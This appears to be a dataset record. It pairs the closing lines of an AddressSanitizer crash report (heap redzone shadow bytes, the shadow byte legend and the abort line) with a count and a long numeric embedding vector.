0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ``` --- end body ---
3,142
[ -0.03797517716884613, 0.02355002984404564, -0.009862704202532768, 0.00260307639837265, 0.05761023983359337, 0.03351813927292824, 0.002394152572378516, 0.04749155789613724, -0.020884841680526733, 0.038095638155937195, -0.0077170017175376415, 0.01067581307142973, 0.004415630828589201, 0.013017264194786549, -0.0036721634678542614, 0.019424257799983025, -0.013965890742838383, 0.008530110120773315, -0.018355170264840126, -0.026651889085769653, 0.013694854453206062, -0.004761954769492149, -0.025597859174013138, 0.02326393686234951, -0.029302019625902176, 0.007950393483042717, 0.005680466070771217, -0.0031620883382856846, -0.021321510896086693, 0.01782815530896187, -0.0013476519379764795, 0.029437538236379623, 0.01182771660387516, 0.007216337602585554, 0.023474741727113724, 0.000863927707541734, 0.04258279129862785, 0.07016824930906296, 0.016247112303972244, 0.03442159295082092, 0.014026121236383915, -0.06257923692464828, -0.012008407153189182, 0.019424257799983025, -0.0014323507202789187, 0.003363483352586627, 0.029000869020819664, 0.0067834327928721905, -0.0319521501660347, 0.015095207840204239, -0.01553940586745739, -0.00859786942601204, -0.04375728219747543, -0.06673512607812881, 0.018837012350559235, -0.026410967111587524, 0.01910804957151413, 0.019183335825800896, 0.0028138821944594383, -0.009953049942851067, -0.009523909538984299, -0.004084364045411348, -0.013205483555793762, 0.024061987176537514, 0.0009599197073839605, 0.012949504889547825, -0.03216295689344406, 0.01270858384668827, -0.026817521080374718, -0.0019480723422020674, 0.0075777191668748856, -0.0419202595949173, 0.0005204270710237324, 0.021833468228578568, 0.02770591713488102, -0.01546411868184805, 0.005608942825347185, -0.004502211697399616, -0.014771469868719578, 0.020267480984330177, -0.02252611517906189, 0.03797517716884613, -0.03360848128795624, 0.023384395986795425, 0.016774125397205353, -0.0038961446844041348, -0.021396799013018608, -0.08372005820274353, -0.004340342711657286, -0.049479156732559204, -0.007784760557115078, 0.026305563747882843, 0.01216651126742363, -0.011767486110329628, 0.00662156380712986, 0.005575063172727823, -0.03478297218680382, -0.016683781519532204, -0.0539361946284771, 0.0037794485688209534, -0.046015914529561996, -0.009727186523377895, -0.0015829263720661402, 0.020749323070049286, 0.02239059843122959, 0.0228724405169487, -0.0019292504293844104, 0.002629427006468177, 0.003677810076624155, 0.10901676118373871, 0.031259503215551376, -0.012309558689594269, -0.026501312851905823, 0.009983165189623833, -0.004863593261688948, 0.008356948383152485, 0.029648343101143837, -0.0025259063113480806, -0.06607259064912796, -0.02178829535841942, -0.00288917007856071, -0.024619117379188538, -0.027239132672548294, 0.00757395476102829, -0.03899909183382988, 0.01686447113752365, 0.011737370863556862, -0.014824171550571918, -0.010073509998619556, -0.01471124030649662, -0.03427101671695709, -0.03827632591128349, 0.013100081123411655, -0.024694405496120453, 0.006918950472027063, -0.009343218058347702, -0.021758180111646652, 0.03180157393217087, 0.004385515581816435, 0.001832317328080535, -0.05709828436374664, -0.04002300649881363, 0.02336934022605419, -0.007882635109126568, -0.03484320268034935, 0.0034613574389368296, -0.03866782411932945, 0.01837022788822651, 0.00193677912466228, -0.006753317546099424, -0.001867137965746224, -0.02677234821021557, 0.0008418119396083057, 0.028564199805259705, 0.03680068626999855, -0.025251535698771477, 0.027871550992131233, 0.049539387226104736, 0.012640824541449547, -0.024769693613052368, 0.009802473708987236, -0.03749333322048187, 0.022224964573979378, -0.03803540766239166, -0.026561543345451355, -0.019228508695960045, 0.03517447039484978, 0.02350485697388649, -0.01145880576223135, 0.02315853349864483, -0.009538967162370682, -0.012196626514196396, 0.030310876667499542, 0.019138162955641747, -0.05414700135588646, -0.002252988051623106, 0.007171164732426405, 0.024152332916855812, -0.010992021299898624, -0.014379973523318768, 0.00862045492976904, -0.007957922294735909, 0.01998138800263405, 0.011978291906416416, 0.009252873249351978, 0.00023268641962204129, 0.03710183873772621, -0.018189536407589912, -0.0021626425441354513, -0.017858270555734634, -0.017165623605251312, -0.0004903119406662881, 0.010984492488205433, -0.016653666272759438, 0.02761557325720787, -0.0308378916233778, -0.03309652581810951, -0.013935775496065617, 0.033066410571336746, -0.012324616312980652, -0.0062752398662269115, 0.017557119950652122, -0.02252611517906189, 0.02076438069343567, -0.016186881810426712, 0.01940920017659664, 0.004106950480490923, 0.054508380591869354, 0.012859160080552101, -0.01221921294927597, -0.016292285174131393, -0.030325934290885925, 0.02052346058189869, 0.006636621430516243, -0.021878641098737717, 0.01588572934269905, -0.011044722981750965, 0.03035604953765869, -0.028112471103668213, -0.0005731285200454295, 0.021231165155768394, -0.020899899303913116, 0.005413194186985493, -0.009275459684431553, -0.0817926898598671, -0.014447732828557491, 0.0065801553428173065, 0.024182448163628578, -0.04505223035812378, 0.0035629961639642715, 0.03348802402615547, -0.04673868045210838, -0.0001244601735379547, 0.02507084421813488, -0.0258538369089365, 0.0009283929248340428, -0.003877322655171156, 0.013883073814213276, -0.019604947417974472, 0.008123556151986122, 0.026907866820693016, 0.02498049847781658, -0.014093879610300064, -0.012392375618219376, 0.022360483184456825, 0.041709452867507935, -0.021713007241487503, -0.008801146410405636, -0.03297606483101845, 0.02579360641539097, -0.0026689532678574324, -0.02844373881816864, 0.01636757142841816, 0.03141007944941521, 0.01758723519742489, 0.00528896925970912, 0.03044639527797699, 0.02452877163887024, -0.02335428260266781, -0.03270502761006355, 0.03797517716884613, 0.012783871963620186, -0.013476519845426083, 0.004031662829220295, 0.005145922303199768, -0.0013843547785654664, -0.013980948366224766, 0.009441092610359192, -0.011503978632390499, -0.0378246009349823, 0.054267462342977524, -0.023474741727113724, -0.011345874518156052, -0.02478475123643875, -0.017481831833720207, 0.006982945371419191, 0.03339767828583717, -0.0009392155334353447, -0.000422082346631214, -0.016849413514137268, -0.008372006006538868, 0.019032761454582214, -0.02746499702334404, 0.03725241497159004, -0.0010192088084295392, -0.018249766901135445, -0.00689260009676218, -0.019318854436278343, -0.020538518205285072, -0.019469430670142174, 0.0008065207512117922, -0.014425146393477917, -0.03797517716884613, -0.0071034058928489685, -0.012783871963620186, 0.03646941855549812, 0.0052061527967453, -0.013672268018126488, -0.04357659071683884, -0.013724969699978828, -0.025492455810308456, -0.006508632097393274, -0.01974046602845192, -0.009049596264958382, -0.03625861555337906, 0.002973868977278471, -0.01662355102598667, 0.024468541145324707, -0.031500425189733505, -0.019604947417974472, 0.03131973370909691, -0.0477927066385746, -0.0034538288600742817, -0.027178902179002762, -0.0339096337556839, -0.023188648745417595, 0.0007029999978840351, -0.023474741727113724, 0.014801585115492344, 0.004152123350650072, -0.048846736550331116, -0.02511601708829403, -0.04375728219747543, 0.012452605180442333, 0.03442159295082092, -0.020538518205285072, 0.004317756276577711, 0.04204071685671806, -0.06161555275321007, 0.019439315423369408, 0.015915844589471817, -0.022164734080433846, 0.00013257714454084635, -0.022616460919380188, -0.008168728090822697, -0.040534961968660355, -0.03914966806769371, 0.02228519506752491, 0.028624428436160088, -0.020930014550685883, -0.01852080412209034, 0.04411866143345833, 0.002924931701272726, 0.010645697824656963, 0.013333473354578018, -0.025763491168618202, 0.013054908253252506, -0.016111593693494797, 0.02922673150897026, -0.01407129317522049, 0.0010116801131516695, 0.05664655566215515, -0.005183566361665726, 0.041829913854599, 0.0009392155334353447, -0.02086978405714035, -0.004483389668166637, -0.0357767716050148, 0.0169999897480011, -0.02716384455561638, 0.0015913962852209806, -0.006263946648687124, 0.003363483352586627, 0.01603630557656288, 0.011503978632390499, 0.013920717872679234, 0.0047431327402591705, 0.0012253092136234045, -0.005917622707784176, 0.004042956046760082, -0.040384385734796524, 0.06751811504364014, -0.02716384455561638, -0.01852080412209034, -0.00860539823770523, -0.02633567899465561, 0.04463062062859535, 0.01373249851167202, -0.03866782411932945, -0.0012761285761371255, -0.03505400940775871, 0.001955601153895259, 0.010864032432436943, -0.034331247210502625, 0.03162088617682457, 0.04137818515300751, -0.00604937644675374, 0.02306818775832653, -0.009930463507771492, -0.024257736280560493, -0.011247999966144562, 0.0674578845500946, -0.009855175390839577, -0.048696160316467285, 0.0030566854402422905, 0.02467934787273407, -0.02252611517906189, -0.017918501049280167, 0.017271025106310844, -0.05444815009832382, -0.013830372132360935, 0.027736032381653786, -0.0228724405169487, 0.0036138154100626707, 0.007479845080524683, 0.041468530893325806, 0.006934008095413446, -0.024769693613052368, 0.010284315794706345, 0.005857392214238644, 0.006817311979830265, -0.01564480923116207, -0.016216997057199478, 0.0041784741915762424, 0.0496598444879055, 0.028654543682932854, -0.008612927049398422, 0.010931791737675667, -0.019951272755861282, -0.00344630004838109, -0.0239866990596056, -0.005447073839604855, 0.024513714015483856, 0.020342769101262093, -0.007641713600605726, 0.006109606474637985, -0.016457917168736458, 0.014620894566178322, 0.019875984638929367, -0.021878641098737717, -0.002429914427921176, 0.010562880896031857, 0.008100969716906548, 0.028609370812773705, -0.02854914218187332, -0.04158899188041687, -0.01867137849330902, -0.03384940326213837, -0.004430687986314297, 0.01478652749210596, 0.015208140015602112, 0.03502389416098595, -0.033789172768592834, -0.018701493740081787, -0.00970460008829832, -0.04035427048802376, -0.040053121745586395, 0.0002755063760560006, 0.018550919368863106, -0.03836667165160179, 0.0014568193582817912, 0.013544279150664806, -0.026561543345451355, 0.00860539823770523, 0.013484048657119274, -0.003941317554563284, -0.04071565344929695, 0.0032298474106937647, 0.018144365400075912, 0.01258812379091978, 0.005676701664924622, 0.029648343101143837, -0.015065092593431473, -0.010525236837565899, 0.02644108235836029, 0.04734098166227341, 0.04300440102815628, -0.03207261115312576, 0.004931352101266384, -0.010103625245392323, 0.004419395234435797, 0.0337289422750473, 0.019364027306437492, -0.012076166458427906, -0.004069306887686253, 0.02169794961810112, -0.003051038831472397, -0.009855175390839577, -0.004441981203854084, -0.024348080158233643, -0.00014657597057521343, -0.020658977329730988, 0.00837953481823206, -0.027148788794875145, 0.013657210394740105, -0.018942415714263916, 0.03646941855549812, 0.007107170298695564, 0.006941536907106638, 0.03698137775063515, 0.004822184797376394, 0.00872585829347372, -0.021185992285609245, -0.050111573189496994, 0.00566917285323143, 0.018023904412984848, -0.006282768677920103, -0.029347192496061325, 0.040685538202524185, 0.015208140015602112, 0.02741982415318489, 0.0038810870610177517, 0.03881840035319328, 0.013446404598653316, 0.008259073831140995, -0.000427493650931865, -0.02907615527510643, 0.021170934662222862, -0.012768814340233803, -0.04167933762073517, 0.006463459227234125, -0.023640375584363937, 0.004084364045411348, -0.04710005968809128, 0.0006775903748348355, -0.023595202714204788, -0.0052023883908987045, 0.004502211697399616, 0.00931310374289751, -0.0009039244032464921, -0.00604937644675374, -0.04207083210349083, -0.01035960391163826, 0.0268325787037611, 0.018355170264840126, 0.0012516600545495749, 0.0028044714126735926, -0.016156766563653946, 0.037222299724817276, -0.028127528727054596, 0.0012638942571356893, 0.0009293340262956917, -0.029633285477757454, 0.04125772416591644, -0.00877103116363287, 0.00987023301422596, -0.008311775512993336, 0.021878641098737717, 0.007223866414278746, -0.015140380710363388, -0.02707350067794323, 0.026426024734973907, -0.05203894153237343, 0.0011509625473991036, -0.0027197725139558315, 0.01769263856112957, -0.00022139324573799968, 0.022119561210274696, 0.004313991870731115, -0.015659866854548454, -0.007694415282458067, -0.01686447113752365, 0.01488440204411745, 0.008545167744159698, -0.00008640453597763553, 0.010954378172755241, -0.011232942342758179, -0.004615143407136202, 0.027796262875199318, -0.012520364485681057, 0.003468886250630021, -0.001550929038785398, 0.02912132814526558, -0.0030736252665519714, -0.004532326944172382, 0.0009420388378202915, -0.013792729005217552, 0.027841435745358467, -0.03803540766239166, -0.02330910973250866, 0.02800706960260868, 0.019830811768770218, 0.014244455844163895, -0.02463417500257492, -0.03107881173491478, -0.002589900977909565, -0.027585458010435104, -0.0018605502555146813, -0.009350746870040894, -0.02970857359468937, -0.0007448788965120912, -0.037794485688209534, -0.006843662820756435, 0.020312653854489326, 0.020192192867398262, -0.01730114035308361, -0.0018050255021080375, 0.003930024337023497, 0.034963663667440414, -0.0084548220038414, -0.0016610375605523586, -0.0006837075343355536, -0.008138613775372505, -0.011315759271383286, 0.025959240272641182, 0.007114699110388756, -0.015991132706403732, 0.010540294460952282, -0.0169096440076828, 0.0029795155860483646, -0.013130195438861847, 0.022992899641394615, 0.030130185186862946, -0.04020369425415993, -0.03040122240781784, 0.010254201479256153, 0.014011063612997532, -0.012302029877901077, -0.01045747846364975, 0.02076438069343567, 0.0376439094543457, 0.004088128451257944, 0.05077410489320755, -0.020056676119565964, 0.01617182418704033, -0.000175985274836421, -0.009200171567499638, 0.014620894566178322, -0.040143467485904694, 0.017406543716788292, 0.015065092593431473, -0.039751969277858734, 0.010487593710422516, 0.019228508695960045, 0.013250656425952911, 0.031982265412807465, 0.009267930872738361, -0.007114699110388756, -0.012527893297374249, -0.009124883450567722, -0.021968984976410866, 0.018550919368863106, 0.007212573196738958, -0.032614681869745255, -0.015065092593431473, 0.03309652581810951, 0.042492445558309555, 0.019424257799983025, -0.018927358090877533, 0.00860539823770523, -0.001796555588953197, -0.0024393254425376654, -0.01172984205186367, 0.015855614095926285, -0.017963673919439316, -0.01426704227924347, -0.0006427697371691465, 0.017376428470015526, 0.01666872389614582, 0.042492445558309555, -0.020252423360943794, -0.010833917185664177, 0.010193970985710621, 0.017511947080492973, 0.02556774392724037, -0.006406993605196476, 0.01680424064397812, 0.03499377891421318, -0.009433563798666, 0.008439764380455017, -0.014229398220777512, -0.015260840766131878, -0.03607792407274246, 0.009810002520680428, -0.0016695073572918773, 0.005872449837625027, -0.03303629532456398, -0.00743843661621213, 0.017722751945257187, 0.03267491236329079, -0.0003973785205744207, -0.011029665358364582, -0.0039751967415213585, 0.0014163521118462086, -0.012038522399961948, -0.022706806659698486, 0.01498227659612894, 0.020583689212799072, -0.02639590948820114, 0.012369789183139801, 0.0014859933871775866, 0.009712128899991512, -0.00004123184407944791, -0.01404870767146349, -0.03625861555337906, 0.005631528794765472, -0.0017551473574712873, -0.011579266749322414, -0.012768814340233803, -0.024152332916855812, 0.027781205251812935, -0.014854286797344685, 0.007092112675309181, 0.01647297479212284, 0.018882185220718384, -0.016337456181645393, 0.028503969311714172, -0.011669612489640713, -0.018294939771294594, -0.003941317554563284, -0.019680235534906387, -0.005895036272704601, 0.008484937250614166, -0.004841006826609373, 0.018972530961036682, 0.018144365400075912, -0.007517488673329353, 0.0005171332159079611, 0.027585458010435104, 0.0030868006870150566, -0.010788744315505028, 0.006263946648687124, -0.042251523584127426, 0.005469660274684429, 0.001072851475328207, -0.028067300096154213, 0.012603181414306164, 0.01275375671684742, -0.01030690222978592, 0.005808455403894186, -0.010389719158411026, -0.02687775157392025, -0.006614034995436668, -0.045473843812942505, 0.0013410643441602588, -0.01695481687784195, 0.0009373333305120468, -0.00859786942601204, -0.009027009829878807, 0.012941976077854633, 0.01329582929611206, -0.026937982067465782, 0.001021091011352837, 0.011955705471336842, -0.025040728971362114, 0.017572177574038506, 0.01686447113752365, -0.016924701631069183, 0.013792729005217552, 0.01725596748292446, 0.009011952206492424, 0.0006352409836836159, 0.015290956012904644, -0.030672257766127586, -0.014349858276546001, -0.00022456944861914963, 0.01686447113752365, 0.01023914385586977, -0.031349848955869675, 0.030130185186862946, 0.00849999487400055, 0.007724530529230833, 0.010480064898729324, -0.03207261115312576, -0.002307571703568101, -0.018189536407589912, 0.018023904412984848, -0.028775004670023918, 0.0020534752402454615, -0.009373333305120468, -0.024363137781620026, 0.022059330716729164, -0.012226741760969162, 0.015855614095926285, 0.036770571023225784, -0.012716112658381462, 0.013544279150664806, -0.030898122116923332, 0.01998138800263405, 0.0025108486879616976, 0.026712117716670036, -0.0010361486347392201, -0.011985820718109608, -0.00047148996964097023, 0.012452605180442333, -0.026953039690852165, 0.003994018770754337, 0.01608147844672203, 0.02638085186481476, 0.016578378155827522, -0.01427457109093666, -0.014628423377871513, -0.03698137775063515, 0.02013196237385273, 0.012957033701241016, -0.002817646600306034, 0.04348624497652054, -0.013085023500025272, 0.006151014938950539, 0.016216997057199478, 0.0002691539702937007, -0.011488921009004116, 0.029015926644206047, -0.021170934662222862, -0.008356948383152485, -0.03484320268034935, 0.03128961846232414, 0.019514603540301323, -0.005349199753254652, -0.02071920782327652, 0.026651889085769653, -0.01656332053244114, -0.04059519246220589, -0.01901770383119583, -0.007935335859656334, -0.033939749002456665, -0.018415400758385658, 0.038005292415618896, -0.021923813968896866, 0.02546234056353569, -0.007077055051922798, 0.004626436624675989, 0.006772139575332403, 0.029392365366220474, -0.008040739223361015, -0.0043441071175038815, 0.006508632097393274, -0.013047379441559315, 0.0018454926321282983, 0.010608053766191006, -0.028383508324623108, 0.004457038827240467, -0.004856064449995756, -0.05977853015065193, -0.00006634739111177623, -0.030868006870150566, -0.007223866414278746, 0.008394591510295868, 0.02165277674794197, 0.0089441929012537, -0.008959250524640083, -0.0042198821902275085, -0.012068637646734715, 0.010608053766191006, 0.01390566024929285, 0.02086978405714035, 0.016457917168736458, -0.00024868507171049714, -0.008432235568761826, 0.05068375915288925, -0.021878641098737717, -0.00400907639414072, -0.009576610289514065, -0.0018087899079546332, -0.02355002984404564, -0.028955696150660515, -0.02711867354810238, 0.0027235369198024273, 0.025085901841521263, 0.01478652749210596, 0.04216117784380913, 0.023233821615576744, -0.007882635109126568, -0.00214946735650301, -0.0062112449668347836, 0.011940647847950459, 0.006550040561705828, -0.004426924046128988, 0.011097424663603306, -0.012746227905154228, 0.029994666576385498, -0.0018417283426970243, 0.009011952206492424, 0.004483389668166637, 0.010081038810312748, 0.02394152618944645, -0.016548262909054756, -0.047581903636455536, 0.010540294460952282, -0.02365543320775032, -0.05014168843626976, 0.0011227296199649572, 0.020402999594807625, 0.001410705503076315, -0.022511057555675507, -0.03728253021836281, -0.003098093904554844, -0.015057563781738281, 0.02844373881816864, 0.04065542295575142, -0.0007778172730468214, -0.0008733387221582234, -0.006527454126626253, 0.017993789166212082, 0.0032317296136170626, -0.06619305163621902, 0.005857392214238644, -0.014997333288192749, -0.017135508358478546, -0.019213451072573662, 0.008868904784321785, 0.025914067402482033, -0.05218951776623726, -0.035596080124378204, 0.03339767828583717, 0.03153054043650627, -0.0011584913590922952, -0.016698839142918587, -0.027043385431170464, -0.01094684936106205, -0.008786088787019253, -0.0012657764600589871, 0.022149676457047462, -0.025010613724589348, -0.002849644050002098, -0.01680424064397812, 0.03658987954258919, 0.001126494025811553, 0.01209875289350748, 0.016548262909054756, -0.002588018774986267, -0.01817448064684868, 0.0037098072934895754, -0.030551796779036522, -0.025402110069990158, 0.006606506183743477, -0.029633285477757454, 0.007397028151899576, 0.030130185186862946, 0.0436067059636116, 0.012158983387053013, -0.01422186940908432, -0.03649953380227089, 0.021758180111646652, -0.004810891579836607, -0.037162069231271744, -0.04670856520533562, 0.0023546265438199043, 0.0016986813861876726, 0.004027898423373699, -0.0000026211043859802885, -0.0035818179603666067, 0.013815315440297127, 0.00860539823770523, 0.011699726805090904, -0.002444972051307559, -0.010608053766191006, -0.0013514163438230753, -0.010781215503811836, -0.028714774176478386, -0.01400353480130434, 0.009885290637612343, 0.030868006870150566, -0.01891230046749115, -0.006467223633080721, 0.004984053783118725, 0.0020534752402454615, -0.008093440905213356, -0.014402559958398342, -0.014101408421993256, -0.01553940586745739, -0.013898131437599659, 0.0016064539086073637, -0.00436292914673686, -0.011187770403921604, 0.013898131437599659, -0.02437819540500641, -0.011639497242867947, 0.004347871523350477, 0.03147030994296074, 0.010615582577884197, 0.01989104226231575, -0.01526836957782507, -0.016683781519532204, 0.004276348277926445, 0.02135162614285946, -0.05399642512202263, -0.002345215529203415, -0.02252611517906189, 0.0007185281137935817, -0.017481831833720207, 0.012354731559753418, 0.012174040079116821, 0.019574834033846855, -0.010231615044176579, 0.026170047000050545, -0.030220530927181244, -0.018294939771294594, -0.005496010649949312, 0.010713457129895687, -0.024619117379188538, 0.014997333288192749, 0.0031827925704419613, -0.01385295856744051, -0.019123107194900513, -0.01949954591691494, 0.01564480923116207, 0.019710350781679153, -0.00959919672459364, 0.006945301312953234, 0.012467662803828716, 0.0051120431162416935, 0.0297688040882349, -0.03655976429581642, 0.009516380727291107, 0.003098093904554844, -0.0016045717056840658, -0.02302301488816738, -0.021728064864873886, 0.008951721712946892, -0.0356864258646965, -0.012949504889547825, 0.021035416051745415, -0.011631968431174755, -0.02120104990899563, 0.005240032449364662, -0.012761285528540611, 0.017662523314356804, -0.001639392226934433, -0.005496010649949312, -0.014906988479197025, -0.0007966392440721393, 0.039902545511722565, -0.030115127563476562, 0.016503090038895607, -0.014763941057026386, -0.020704150199890137, 0.008417177945375443, 0.003047274425625801, 0.029091212898492813, -0.01258812379091978, -0.009847646579146385, -0.006297826301306486, -0.0005891271866858006, 0.016397686675190926, 0.026185104623436928, -0.004750661551952362, -0.01285163126885891, 0.014334800653159618, 0.0042274110019207, -0.01243754755705595, 0.01243754755705595, 0.0013005970977246761, -0.008838790468871593, -0.025010613724589348, 0.008432235568761826, 0.01422186940908432, -0.02120104990899563, -0.029000869020819664, 0.016503090038895607, 0.03553584963083267, -0.003485826076939702, -0.02248094230890274, 0.008176256902515888, -0.0022454592399299145, 0.006181130185723305, 0.001231896923854947, -0.004645258653908968, 0.016924701631069183, -0.04002300649881363, 0.01719573885202408, 0.001938661327585578, 0.05125594884157181, -0.031831689178943634, -0.028278104960918427, 0.005906329490244389, -0.008612927049398422, -0.02737465128302574, 0.005134629551321268, 0.0033427791204303503, -0.014251984655857086, -0.006636621430516243, 0.004664080683141947, -0.03059696964919567, -0.03469262644648552, -0.017993789166212082, -0.011850303038954735, 0.017527004703879356, 0.004622672218829393, -0.009350746870040894, -0.00675708195194602, 0.021878641098737717, -0.016397686675190926, -0.0021344097331166267, 0.03728253021836281, -0.022857382893562317, 0.009569081477820873, -0.00479959836229682, -0.007581483572721481, -0.03821609914302826, -0.01660849340260029, -0.004080599639564753, -0.015215668827295303, 0.024739578366279602, -0.03131973370909691, 0.015449061058461666, 0.019364027306437492, 0.0027348301373422146, 0.022420713678002357, -0.001970658777281642, -0.019183335825800896, -0.0074873738922178745, 0.013235598802566528, -0.010916734114289284, -0.016653666272759438, -0.020056676119565964, 0.010592996142804623, 0.10889630019664764, -0.025929125025868416, 0.010555352084338665, -0.027133731171488762, 0.0249654408544302, 0.013371116481721401, 0.0010803801706060767, 0.01803896203637123, -0.005364257376641035, -0.012881745584309101, 0.015614693984389305, -0.013649681583046913, -0.013619566336274147, 0.007950393483042717, 0.02463417500257492, -0.0019970093853771687, -0.019951272755861282, -0.013822843320667744, 0.032132841646671295, -0.007483609486371279, 0.017120450735092163, -0.004400573205202818, 0.015584578737616539, -0.00882373284548521, 0.025326821953058243, -0.021035416051745415, -0.023519914597272873, -0.027796262875199318, -0.014914517290890217, -0.018897242844104767, -0.004709253087639809, -0.004276348277926445, -0.02428785152733326, -0.01475641317665577, -0.0006582978530786932, 0.00774711649864912, 0.01578032784163952, -0.0035592317581176758, -0.01832505501806736, 0.0002529200282879174, -0.0036947496701031923, -0.00859786942601204, -0.025010613724589348, -0.009779888205230236, 0.01749688945710659, -0.005846098996698856, 0.027886608615517616, 0.0023282759357243776, -0.002763062948361039, -0.003926259931176901, 0.00653874734416604, -0.019529661163687706, 0.04716029018163681, 0.012332145124673843, 0.012030993588268757, 0.03421078622341156, 0.006346763111650944, -0.011639497242867947, -0.014116466045379639, -0.021532315760850906, -0.005879978649318218, 0.010276786983013153, -0.015260840766131878, 0.006764610763639212, 0.018249766901135445, -0.008266602642834187, -0.03137996420264244, -0.0010784979676827788, -0.0076379491947591305, 0.02726924791932106, 0.019800696521997452, 0.010480064898729324, -0.008003095164895058, -0.0024393254425376654, 0.017180681228637695, 0.003937553148716688, 0.006768375169485807, 0.03448181971907616, -0.015945959836244583, -0.017406543716788292, 0.03165099769830704, 0.03282548859715462, -0.016201939433813095, 0.017075277864933014, -0.009930463507771492, 0.031139042228460312, -0.006587684154510498, -0.013770142570137978, 0.0003684397670440376, -0.01004339475184679, -0.0011754310689866543, 0.013860487379133701, 0.02233036793768406, -0.0013194190105423331, 0.00545083824545145, 0.031590770930051804, 0.016548262909054756, -0.010178913362324238, -0.010058452375233173, -0.026561543345451355, 0.0037794485688209534, -0.006813547573983669, 0.02028253860771656, -0.011797601357102394, -0.0024788514710962772, 0.004841006826609373, -0.008740915916860104, 0.022646576166152954, 0.013566865585744381, -0.01773780956864357, -0.026953039690852165, -0.020583689212799072, 0.021517258137464523, -0.006358056329190731, -0.0020572396460920572, 0.033698827028274536, 0.008560225367546082, -0.029452595859766006, -0.015795385465025902, -0.032223187386989594, -0.011496449820697308, -0.02702832780778408, 0.05029226467013359, -0.020749323070049286, 0.011639497242867947, -0.005575063172727823, -0.005631528794765472, -0.022300252690911293, 0.013890602625906467, 0.01949954591691494, 0.019077934324741364, 0.009742244146764278, 0.012354731559753418, -0.011263057589530945, 0.015991132706403732, -0.032524339854717255, 0.01999644562602043, 0.0160212479531765, -0.0029305783100426197, -0.0014558782568201423, -0.010540294460952282, 0.028820177540183067, 0.009757301770150661, 0.0074873738922178745, 0.005270147230476141, -0.0040542492642998695, 0.0004387868393678218, 0.013589451089501381, 0.010856503620743752, 0.035987578332424164, 0.007114699110388756, -0.022797152400016785, 0.016488032415509224, 0.022465884685516357, -0.0026840108912438154, 0.017436658963561058, 0.0199362151324749, -0.018294939771294594, 0.009584139101207256, 0.0010154445189982653, 0.011677141301333904, -0.005157215520739555, 0.013792729005217552, -0.0033879519905894995, -0.0109016764909029, 0.028022127225995064, 0.0048334780149161816, -0.0639043003320694, -0.0041295369155704975, -0.024107160046696663, 0.0015923373866826296, -0.010961906984448433, -0.026305563747882843, 0.009772359393537045, 0.006011732388287783, -0.003914966713637114, -0.0027084792964160442, 0.030868006870150566, 0.020508402958512306, -0.03665011003613472, 0.0012384846340864897, 0.015140380710363388, 0.013574394397437572, -0.0003249139990657568, 0.01721079647541046, -0.027495112270116806, -0.011473863385617733, -0.0016873882850632071, -0.03649953380227089, 0.004946409724652767, 0.013205483555793762, 0.04890696704387665, -0.0005834805779159069, -0.014816642738878727, -0.007099641487002373, -0.013755084946751595, -0.020538518205285072, -0.015629751607775688, -0.010758629068732262, 0.01597607508301735, 0.006361820735037327, -0.016774125397205353, -0.0028477618470788, -0.0016139826038852334, 0.008146142587065697, -0.027992011979222298, -0.004848535638302565, 0.015298484824597836, 0.0011123775038868189, -0.0027931781951338053, -0.001725973328575492, 0.016548262909054756, 0.017180681228637695, -0.020854726433753967, -0.0038886158727109432, 0.009154998697340488, -0.004246233031153679, -0.011857831850647926, 0.013928246684372425, 0.0030905650928616524, 0.003399244975298643, 0.017707696184515953, 0.010382190346717834, 0.0054320162162184715, -0.006881306879222393, 0.005055577028542757, 0.033457908779382706, -0.0436067059636116, 0.003457593033090234, 0.013860487379133701, -0.028458796441555023, -0.017406543716788292, -0.02165277674794197, 0.01018644217401743, -0.012452605180442333, -0.010698399506509304, 0.024182448163628578, 0.006071962881833315, -0.003647694829851389, 0.003933788742870092, 0.01192559115588665, -0.013747556135058403, -0.018852069973945618, 0.014485376887023449, 0.004874886479228735, -0.0002335098834009841, 0.007517488673329353, -0.015019919723272324, -0.004995347000658512, 0.027254190295934677, -0.005454602651298046, 0.007995566353201866, 0.004438216798007488, -0.022104503586888313, -0.00429893471300602, 0.011421162635087967, 0.0012544833589345217, -0.0010606171563267708, 0.019379084929823875, 0.007543839514255524, 0.010833917185664177, -0.013868016190826893, -0.005078163463622332, 0.010472536087036133, -0.016849413514137268, 0.01793355867266655, -0.00016504501400049776, -0.00811602734029293, 0.01754206232726574, 0.0149295749142766, 0.01030690222978592, 0.0009966224897652864, 0.00111143640242517, 0.00012010760110570118, -0.001918898313306272, -0.0037267471197992563, 0.007686886470764875, -0.021336568519473076, -0.0008196961134672165, -0.0036533414386212826, -0.02757040038704872, 0.0737820640206337, -0.016337456181645393, -0.025251535698771477, -0.005635293200612068, -0.046015914529561996, -0.027329478412866592, -0.013318415731191635, -0.021035416051745415, -0.0109016764909029, -0.002975751180201769, 0.00850752368569374, -0.008364477194845676, -0.021532315760850906, 0.049087658524513245, 0.008055796846747398, -0.010660755448043346, 0.01656332053244114, -0.003487708279863, 0.009403448551893234, 0.013438875786960125, 0.05092468112707138, 0.01236226037144661, 0.00035738188307732344, -0.013325944542884827, -0.0025635503698140383, 0.004024134017527103, -0.012919389642775059, 0.0024863802827894688, -0.03649953380227089, 0.0019951271824538708, -0.0007698179688304663, -0.01632239855825901, -0.027841435745358467, -0.006324176676571369, -0.003997783176600933, -0.00615854375064373, -0.007412085775285959, -0.010931791737675667, -0.0020685328636318445, 0.008560225367546082, -0.025010613724589348, -0.0009514498524367809, -0.02056863158941269, -0.019951272755861282, 0.008868904784321785, 0.007080819457769394, 0.013868016190826893, 0.001093555591069162, -0.02023736573755741, 0.022977842018008232, 0.006975416559726, 0.024031871929764748, -0.004837242420762777, 0.016653666272759438, -0.0006394759402610362, 0.018701493740081787, 0.010299373418092728, -0.010879090055823326, -0.013047379441559315, -0.03412044048309326, 0.02574843354523182, -0.004065542481839657, 0.012964562512934208, 